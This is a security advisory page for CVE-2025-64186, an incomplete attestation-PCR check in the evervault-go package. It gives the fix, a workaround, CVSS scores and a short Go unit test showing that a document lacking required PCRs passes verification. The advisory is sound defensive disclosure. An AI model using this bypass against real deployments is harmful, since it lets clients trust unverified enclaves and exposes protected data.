Improper Verification of Cryptographic Signature in github.com/evervault/evervault-go | CVE-2025-64186

Q: How to fix?

Upgrade github.com/evervault/evervault-go to version 1.3.2 or higher.

Threat Intelligence

Proof of Concept

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk IDSNYK-GOLANG-GITHUBCOMEVERVAULTEVERVAULTGO-13924193
published13 Nov 2025
disclosed12 Nov 2025
creditJoranHonig

Report a new vulnerability Found a mistake?

Introduced: 12 Nov 2025

NewCVE-2025-64186 (opens in a new tab) CWE-347 (opens in a new tab)

How to fix?

Upgrade github.com/evervault/evervault-go to version 1.3.2 or higher.

Overview

Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature via incomplete validation of attestation documents in the attestation verification process. An attacker can cause clients to trust enclaves that do not meet expected integrity guarantees by submitting documents with missing or incomplete PCR values.

Note: This is only exploitable if the application is attesting enclaves hosted outside of the default environment and does not explicitly check for the presence and validity of all required PCRs.

Workaround

This vulnerability can be mitigated by modifying the application logic to fail verification if PCR8 is not explicitly present and non-empty and/or by adding custom pre-validation to reject documents that omit any required PCRs.

PoC

package evervault
import (
        "testing"

        "github.com/evervault/evervault-go/attestation"
        "github.com/stretchr/testify/assert"
        "github.com/hf/nitrite"
)


func TestVulnerableCompare(t *testing.T) {
          assert := assert.New(t)
          // arrange
          expectedPCRs := []attestation.PCRs{
                attestation.PCRs{
                      PCR0:
"000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001",
                      PCR1:
"000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002",
                      PCR2:
"000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003",
                      PCR8:
"000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004",
                     },
           }
            actualDocument := nitrite.Document {}
            actualDocument.PCRs = map[uint][]byte{
                    10: make([]byte, 32),
            }
            // act
            v := verifyPCRs(expectedPCRs, actualDocument)
            
            // assert
            // Verify should not pass but it does
            
            assert.Equal(true, v)
}

References

CVSS Base Scores

version 4.0

version 3.1

Attack Vector (AV)
Network
Attack Complexity (AC)
Low
Attack Requirements (AT)
None
Privileges Required (PR)
High
User Interaction (UI)
None

Confidentiality (VC)
High
Integrity (VI)
High
Availability (VA)
None

Confidentiality (SC)
High
Integrity (SI)
High
Availability (SA)
None

Improper Verification of Cryptographic Signature Affecting github.com/evervault/evervault-go package, versions <1.3.2

Severity